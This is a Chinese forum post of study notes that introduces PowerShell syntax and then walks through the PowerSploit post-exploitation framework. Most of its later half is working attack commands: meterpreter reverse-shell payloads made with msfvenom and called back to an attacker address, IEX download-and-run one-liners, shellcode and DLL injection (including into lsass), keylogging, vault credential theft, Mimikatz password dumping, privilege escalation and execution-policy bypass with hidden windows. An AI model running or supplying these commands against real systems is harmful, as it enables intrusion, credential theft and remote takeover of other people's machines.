历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    从零开始学PowerShell渗透测试
    fz41 渗透测试 12764浏览 · 2019-07-27 01:40

    从零开始学PowerShell渗透测试

    前言

    win7以后,powershell默认安装在windows上,这是一个非常强大的渗透测试利器

    主要用于后渗透的过程中,扩大攻击面,原来没有怎么接触过这玩意,最近发现了几款ps渗透框架才意识到了powershell的强大。所以,还是准备好好学学。从零开始的那种。

    基本语法入门

    启动

    直接通过启动栏输入powershell就好

    简单命令

    Get-Help

    主题
Windows PowerShell 帮助系统

    Get-Alias

    获取当前会话中的所有别名
获取别名之后你会发现,有很多和linux相通的命令  cd  ls   tee  .....

    关于Cmdlets

    • powershell里重要的命令集合
    • 以.net形式存在
    • Get-Command -CommandType cmdlet 命令可以获取其命令集

    start-process

    start-process  notepad.exe

    Get-Process

    获取指定的进程

    Get-Content

    类似cat

    Get-Location

    类似pwd

    Copy-Item

    cp

    Move-Item

    mv

    基本语法

    运算符

    · >:将输出保存到指定文件中(用法:Get-Process>output.txt)

· >>:将脚本的输出追加到指定文件中(用法:test.ps1>>output.txt)

· 2>:将错误输出到指定文件中(Get-Porcess none 2>Errors.txt)

· 2>>:将错误追加到指定文件中(Get-Process none 2> logs-Errors.txt)

· -eq:等于运算符(用法:$var1 –eq $var2,返回真或假)

· -gt:大于运算符(用法:$var1 –gt $var2,返回真或假)

· -match:匹配运算符,搜索字符串是否在文中出现(用法:$Text –match $string返回真或假)

· -replace:替换字符串(用法:$Text –replace 被替换的字符,替换的字符,返回真或假)

· -in:测试一个字符或数字是否出现在文本中或列表中,声明列表直接使用()

    数组

    $Array = value1, value2, value3

    语句

    • 条件语句 
    If($var {comparison_statement} $var2) { What_To_Do)}
Else {what_to_do_if_not}
    • 循环语句
    · While () {}

· Do {} While()

· For(;;;) {}

    渗透测试框架PowerSploit

    简介

    https://github.com/mattifestation/PowerSploit.git

    PowerSploit是Microsoft PowerShell模块的集合,可用于在评估的所有阶段帮助渗透测试人员

    有很多可用的模块,源码直接在git上可以下载到,以下就简单介绍一下使用方法。

    CodeExecution模块

    在目标主机执行代码

    Invoke-Shellcode.ps1

    向指定进程中注入我们的shellcode

    配置可执行代码:

    # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1234 -f powershell -o /shell.txt
# msfconsole 监听刚才的payload配置

    靶机下载代码,并执行

    PS C:\> Import-Module C:\PowerSploit\CodeExecution\Invoke-Shellcode.ps1
PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/shell.txt')
PS C:\> Invoke-Shellcode -Shellcode @($buf) -ProcessId 6284

    Invoke-DllInjection.ps1

    将自己的dll注入到目标机器的指定进程中,

    administrator或者system权限操作

    配置dll

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.6 LPORT=1234 -f dll -o /root/Desktop/shell.dll

    加载代码,执行

    Import-Module C:\PowerSploit\CodeExecution\Invoke-DllInjection.ps1
Invoke-DllInjection -ProcessID 5560 -Dll shell.dll

    Invoke-ReflectivePEInjection.ps1

    远程注入dll

    Import-Module C:\PowerSploit\CodeExecution\Invoke-ReflectivePEInjection.ps1
$PEBytes = [IO.File]::ReadAllBytes('c:\shell.dll')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName 2008R2DC

    Exfiltration模块

    用来信息搜集的

    截屏

    Import-Module C:\PowerSploit\Exfiltration\Get-TimedScreenshot.ps1
Get-TimedScreenshot -Path c:\temp\ -Interval 5 -EndTime 11:23  每5秒截一次图,到11:23时结束

    键盘记录

    meterpreter再开的cmd[shell] 
Import-Module C:\PowerSploit\Exfiltration\Get-Keystrokes.ps1
Get-Keystrokes -LogPath C:\temp\key.log -Timeout 2  记录2分钟

    抓取Windows vault 中保存的各种密码

    Import-Module C:\PowerSploit\Exfiltration\Get-VaultCredential.ps1
Get-VaultCredential

    mimikatz套件

    Import-Module C:\PowerSploit\Exfiltration\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit" 抓取系统本地的用户密码明文及hash

    Privesc模块

    用来提权的模块

    将当前线程令牌提到system

    Import-Module C:\PowerSploit\Privesc\Get-System.ps1
Get-System

    执行提权的各种检查

    要检查的内容比较多,如,可执行文件权限,服务运行权限,检查可被劫持的dll位置

    Import-Module C:\PowerSploit\Privesc\PowerUp.ps1 
Invoke-AllChecks | Out-File pri_info.txt

    内网信息搜集的一些小模块

    端口扫描

    Import-Module C:\PowerSploit\Recon\Invoke-Portscan.ps1
Invoke-Portscan -Hosts 192.168.3.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389" | Out-File port_info.txt

    dns反向解析

    Import-Module C:\PowerSploit\Recon\Invoke-ReverseDnsLookup.ps1 
Invoke-ReverseDnsLookup '192.168.3.20-192.168.3.24'

    精通

    在执行powershell脚本时有些时候会报错,有如下绕过的方法

    本地权限绕过

    PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

    本地隐藏权限绕过

    PowerShell.exe -ExecutionPolicy Bypass -NoLogo –NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1

    远程下载绕过

    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://网址/对应脚本名称'); Invoke-Mimikatz -DumpCreds"

    后记

    上面就是学习的powershell的一些笔记,这些笔记学的也比较粗浅,归根接地这都是要运到实战上的,大牛勿喷,以后继续努力。

    参考链接

    https://klionsec.github.io/2016/10/06/powersploit/

    https://github.com/PowerShellMafia/PowerSploit

    https://www.freebuf.com/column/171993.html

    7 人收藏 0 人喜欢 转载 分享
    0 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持